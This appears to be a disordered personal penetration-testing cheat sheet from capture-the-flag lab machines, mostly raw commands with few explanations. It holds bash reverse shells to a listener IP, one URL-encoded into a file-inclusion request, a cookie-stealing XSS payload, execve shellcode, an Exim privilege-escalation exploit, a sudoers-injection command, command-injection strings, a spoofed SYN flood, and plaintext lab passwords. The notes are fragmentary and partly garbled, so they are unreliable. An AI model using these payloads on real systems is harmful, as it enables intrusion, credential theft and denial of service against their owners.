txt -m 6ping sweep

#port scan
nikto --host <ip address>
######__PYTHON__################
upload reverse
##ensure update file 777
wget -O /tmp/reverse
sudo -l ### reveal sudo powers
irssi -c # connect pentest server
#using vim as a set userid program
#this info comes from sudo -l
sudo -u waldo /usr/bin/vim /etc/apache2/sites-available/000-default.conf
kill waldo irssi process inside vim #!kill<process pid>
/nick waldo
upload simple  to remote server
nc -nlvp 444
run simple irssi #with waldo priviledges .run /tmp/simple
####service scan
#decode base64 string
echo -n aW1mYWRtaW5pc3RyYXRvcg== | base64 -D >> flags.txt
#####sqlmap
http://192.168.0.105/imfadministrator/uploads/6b26454f2373.gif?file=echo%20%E2%80%9Cbash%20-i%20%3E&%20/dev/tcp/192.168.0.104/1234%200%3E&1%E2%80%9D%20%3E%3E%20%20/tmp/hell
echo "bash -i >& /dev/tcp/192.168.0.104/1234 0>&1" > ./hell
host <ip>
cat /etc/services/<port number>
cat <encode_file.txt>|base64 --decode > <ouput file or binary>
eric@192.168.244.157
enumerate smb

linenum very useful script
linux system info/user info
#######check out who owns what
#
/opt/misc/priv.py
##########POSt

######Upload




/bin/sh
notes use system program in a a script using the effective user id of the
script 
##List Users



#####Crunch

brute force wordpress users
wget https://www.exploit-db.com/donwload/37292 --no-check-certificate-O ofs.c
cate-O ofs.c

##############Mutillidae###########

' or 1=1#
email=' || email LIKE '%';#

#SQL injection
for level one security javascript validation enter in innocuous
alpha numeric then alter in brup suite
###########HERE IT IS##################
Windows Key
bd2T3pR1fu

Assembly stuff
apt-get install execstack
#########as root
sysctl -p
#Dump core
#:w
#ulimit -c unlimited
#system address
#

http://192.168.0.106/uploadform.php?page=php://filter/convert.base64-encode/resource=index.php
########GDB
x/1i $eip
stepi

####SHELLCODE

int main() {
    int *ret;
    ret = (int *)&ret + 2;
    (*ret) = (int)shellcode;
}


int main() {
    int *ret;
    ret = (int *)&ret + 2;
    (*ret) = (int)shellcode;
}
ip -s link
#####PING REVERSE SHELL
sudo sysctl -w net.ipv4.icmp_echo_ignore_all=1
######Find all setuserid programs
##########Run command in background and discard stdout and stderr

ps aux > /tmp/ps1
ps aux > /tmp/ps2
diff ps1 ps2
ftp>!/bash/bash
upload file to server with ^  ^
mysql >\! <command>



echo wDOW0gW/QssEtq5Y3nHX4XlbH/Dnz27qHFhHVpMulJSyDCvex++YCd42tx7HKGgB openssl aes-128-ecb -d
##########Nikto Proxy

#######cewl with proxy
##Set up a listener on  port 8000

enter the below into input field and wait for the comeback
<script>top.location="http://192.168.110.103:8000/" + document.cookie;</script>
####DIRBUSTER
##########READ Remote Host File
###Large input for buffer overflow using python

cat /proc/self/maps
#show memory layout 
can run gdb on pid
gdb <executable name><pid>

______________GDB

Smash the tux
------------------
__________________

###list docker containers
docker container ls
showmount -e 192.x.x.x.x
mount -t nfs 192.168.0.151:/tmp /opt/tmp
#lets find out who's running nfs
ps aux | grep nfs


###PULLING Image from an external site
LFI/RFI

#PULLING image from an external site
#receiving end
nc -l 6666 > bas
sending end
cat <file> bas | nc 192.168.0.106 1234
check out kvasir
mysql and netcat stuff
sudo arp-scan -l

#############Nmap vuln scanner


apt install iscsi

iscsiadm -m discovery -t st -p





----------------Hydra phpmyadmin
phpmyadmin console
___________
JOHNNY Boy
_______
steghide --extract -sf Alfajet106.wav
ruby -v -run -e httpd . -p 8000 

______________
add to the top of a wordpress "plugin"
pings blocked
#command injection
; ls 

unrar e 000000213.jpg
unrar e lol.jpg
acid.exploit@gmail.com








IMF
##############
______________
 cat /etc/services/7788


How to crash
create pattern 
ltrace agent <hit enter>
agent id 48093572
eax 0xffffcd04 
seg fault address 0x41366641
find the pattern offset
grep call eax
use peda jmpcall to eax
0x8048563



#victim machine
portfwd -l 7788 -r 127.0.0.1
IMF sqlmap
__________

peda shell <execute command>
b *0x9048f23 break at memory address
checksec
putchar 
shell ./sploit.py > in.txt
0x8048400
don't forget c for continue inside gdb
context stack 25
vmmap for libc
find /bin/sh
remote server after+++++ cat john-key.pub > authorized_keys
sudo -l
sudo /usr/local/sbin/nfs start
rpcinfo -p 192.168.0.109
showmount -e 192.168.0.109
sudo  mount 192.168.0.109:/opt/nfs /remotezen/nfs 
kvasir
SQL INJECTION//////
commix --url="http://192.168.110.103/admin.php" --data="service=apache2" --cookie="PHPSESSID=4v7qaj8kg9t66au04u22fjthk0; 1474544351=; 1474544398=; 1474545698=; 1474546238="

sudo locale-gen "en_US.UTF-8"
sudo dpkg-reconfigure locales


__SHELLCODE x86
---------------------------
"\x31\xc0\x99\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
________________________________________


1|ls
1|pwd& whoami & ps aux
1| uname -a & users& id &w


pyenv install --list

lynis audit system
___________
table data

acid reloaded

c7j85d7g4epfbuneg6r14n4v80
pappy -l
find ids
++++++++ls

run shell command
!<command>

+++++++++++ic requests, responses <id>
to view full request/response

+++++++++vfq <id>

_________________send repeater <rp>
leader<,><f>
encode to html
scp level08@192.168.0.108:/home/flag08/capture.pcap .   
_______________mysql from command line
echo "SELECT hostname from sensor;" | mysql -u root -p snort
Environmental variables
___UFW
___Old releases
deb http://old-releases.ubuntu.com/ubuntu/ oneiric main
deb-src http://old-releases.ubuntu.com/ubuntu/ oneiric main
deb http://old-releases.ubuntu.com/ubuntu/ oneiric-updates main
deb-src http://old-releases.ubuntu.com/ubuntu/ oneiric-updates main
deb http://old-releases.ubuntu.com/ubuntu/ oneiric universe
deb-src http://old-releases.ubuntu.com/ubuntu/ oneiric universe
deb http://old-releases.ubuntu.com/ubuntu/ oneiric-updates universe
deb-src http://old-releases.ubuntu.com/ubuntu/ oneiric-updates universe
deb http://old-releases.ubuntu.com/ubuntu oneiric-security main
deb-src http://old-releases.ubuntu.com/ubuntu oneiric-security main
deb http://old-releases.ubuntu.com/ubuntu oneiric-security universe
deb-src http://old-releases.ubuntu.com/ubuntu oneiric-security universe
++++++++++++++create iso
dd if=/dev/cdrom of=/directory/example.iso
mkisofs -o /home/linuxlookup/example.iso /source/directory/
cabextract spsuiv69.exe
mkisofs -b IVUJ11US.IMG  -o biosboot.iso IVUJ11US.IMG
____________wget with password username
 wget --user natas2 --password ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi http://natas2.natas.labs.overthewire.org/files/pixel.png

________sneaky backdoor
http://192.168.0.102/flicks/phpinfo.pht?ctime=system&atime=ls%20-la
/\csneaky __________case insensitive search
__________compile 32 on 64

___Mitmproxy with curl
mitmproxy --socks -p 8881
Acid curl --socks5 127.0.0.1:8881 192.168.0.105:33447
fire up man in the middle proxy
watch for command execution
ie: 
find / -name *pcap*
look for tcp stream
found saman
1337hax0r
cd /home/saman
history
sudo -l
sudo su
cat /root/flag.txt



__________spoof mac
++vendor and byte
macchanger -r eth0
++no vendor
macchanger -e eth0


_____Samba
smbclient //BBox/EricsSecretStuff -u anonymous
ls
get ebd.txt


_______________MAKE A wordlist
cat /root/rockyou.txt | grep veronica > veronica.txt

aircrack-ng eg-01.cap -w /$WORDLISTS/rockyou.txt
erics backdoor
triscuit*
___Nmap udp tcp Hammer time

tcpdump -i eth0 -vv | tee -a dump.txt
decompress bz2 bzip2 -d <file>.bz2
 sudo convert 'https://pwn.com"|echo '\''margo ALL=(ALL:ALL) ALL'\'' >> /etc/sudoers"' out.png
___WPSCAN brute

++++++
___________works with mr robot
check out new group
_____hydra

xalan -html -in pegasus_arp_scan.xml -out pegasus_arp.html
____________wireshark



________sqlmap
dump all databases

dump tables
tcpdump src <host ip>
xalan -html -in pegasus_arp_scan.xml -out pegasus_arp.html
_____hping3
++anonymous Syn flood
hping3 -S --flood --interface eth0 --rand-source 192.168.0.102 
[+]spoofed scan
  hping -I eth0 -a 192.168.10.1 -S 192.168.10.33
hping3 -I eth0 -z -t 6 -S hacker -p 143
[+]++like firewalk
hping3 -I eth0 -z -t 6 -S hacker -p 143

_________Reverse engineering
perl -e 'local $/; print unpack "H*", <>' file
this was done on test.bin
zico
iconv -f ISO8859-1 -t UTF8 file.sql > file-utf8.sql


___MORIA
____________-

cat /etc/fstab show mounted disks
_________/etc/shadown
[+] what type of encryption


    does not have a $ sign, DES is used;
    starts by $1$, MD5 is used;
    starts by $2$ or $2a$, Blowfish is used;
    starts by $5$, SHA-256 is used;
    starts by $6$, SHA-512 is used.
  [+]On modern Linux systems, you want to avoid DES and MD5. DES algorithm for password encryption will limit the size of the password to 8 characters and is really easy to crack. MD5 doesn't present the same length weakness but is pretty quick to brute force compared to other algorithms. 

very powerful
nikto -h wally -port 60080 -root "/?page=" 
__filter php bypass
text/x-php
____SCRATCH

package root;
use strict;
use warnings;
system("/bin/bash");
PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim-4.84-7 -ps
tar xvf backup.tar
cd home/paul/keys
chmod 600 id_key4
in menu 
edit file
now in vim
:set /bin/bash
!bash
got shell!!!
find / -perm -4000 -ls 2/dev/null
/usr/exim/bin/exim-4.84-7

Exim < 4.86.2 - Privilege Escalation  | linux/local/39549.txt
cp $PLATFORM/linux/local/39549.txt .
cat > /tmp/root.pm << EOF
package root;
use strict;
use warnings;

system("/bin/bash")

PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim-4.84-7 -ps
got root


+++++++++++++++++++++++++++++
____freedom fighting repo
_SOCAT
socat openssl-listen:443,reuseaddr,cert=server.pem,cafile=client.crt,method=TLS1 file:`tty`,raw,echo=0
python dirsearch.py -u orcus -e php
python dirsearch.py -u http://tommy:8008/NickIzL33t -e html -w $BIG 
 wpscan --username bully --url http://192.168.56.223/bull/ --wordlist $LAB/words-john.txt --threads 10
get rid of ^M
%s/\r\(\n\)/\1/g
misconfigured apache
b374k.php.jpg
